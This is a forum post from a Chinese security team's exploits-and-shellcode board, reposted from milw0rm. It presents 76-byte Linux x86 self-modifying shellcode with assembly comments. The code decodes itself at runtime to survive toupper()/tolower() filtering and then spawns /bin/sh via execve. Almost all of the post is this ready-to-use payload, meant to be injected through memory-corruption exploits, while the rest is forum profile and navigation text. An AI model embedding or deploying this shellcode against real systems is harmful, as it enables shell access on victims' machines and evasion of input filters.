linux/x86 Magic Byte Self Modifying Code 76 bytes

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6831
精华: 834
积分: 36069
阅读权限: 255
性别: 男
来自: 中国
在线时间: 599 小时
注册时间: 2004-6-25
最后登录: 2008-12-3

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-24 17:15 只看该作者

linux/x86 Magic Byte Self Modifying Code 76 bytes

文章作者：XORt

复制内容到剪贴板

代码:

/*-------------------------------------------------------*/

/*    Magic Byte Self Modifying Code for surviving    */

/*          toupper() & tolower()             */

/*      76bytes execve() _exit() code by XORt       */

/*-------------------------------------------------------*/

"\xeb\x34"          /* jmp $0x34       [revert]  */

"\x5e"             /* pop %esi              */

/*--set-up-variables-------------------------------------*/

"\x89\xf7"          /* mov %esi, %edi          */

"\x83\xef\x22"        /* sub $0x22, %edi          */

"\x31\xc9"          /* xor %ecx, %ecx          */

"\xb1\x8c"          /* mov $0x8c, %cl          */

"\xd1\xc9"          /* ror $0x1, %ecx   (70loops)  */

/*-scan-for-magic-byte-----------------------------------*/

"\xb0\x7b"          /* mov $0x7b, %al          */

"\xf2\xae"          /* repne scasb            */

"\xff\xcf"          /* dec %edi              */

"\xac"             /* lodsb        (al=DS:SI)  */

"\x28\x07"          /* subb %al, (%edi)         */

/*--loop-back-to-scanner---------------------------------*/

"\xe2\xf5"          /* loop -$0xe    [load-byte]  */

/*-------------------------------------[length:25bytes]--*/

//                                     //

/*--modified-shellcode-----------------------------------*/

"\x89\x7b\x08"        /* movl %esi, 0x8(%esi)      @*/

"\x91"             /* xchg %eax, %ecx          */

"\x88\x7b\x07"        /* movb %al, 0x7(%esi)      @*/

"\x89\x7b\x0c"        /* movl %eax, 0xc(%esi)      @*/

"\xb0\x0b"          /* movb $0xb, %al          */

"\x89\xf3"          /* movl %esi, %ebx          */

"\x8d\x7b\x08"        /* leal 0x8(%esi), %ecx      @*/

"\x8d\x7b\x0c"        /* leal 0xc(%esi), %edx      @*/

"\xcd\x80"          /* int $0x80              */

"\x31\xdb"          /* xorl %ebx, %ebx          */

"\x89\xd8"          /* movl %ebx, %eax          */

"\x40"             /* inc %eax              */

"\xcd\x80"          /* int $0x80              */

/*--revert-----------------------------------------------*/

"\xe8\xc7\xff\xff\xff"  /* call -$0x39            */

/*--offset-table-----------------------------------------*/

"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13"         /**/

/*--string-to-run----------------------------------------*/

"/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh"        */

/*--------------------------------------[length:51bytes]-*/



//milw0rm.com

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » linux/x86 Magic Byte Self Modifying Code 76 bytes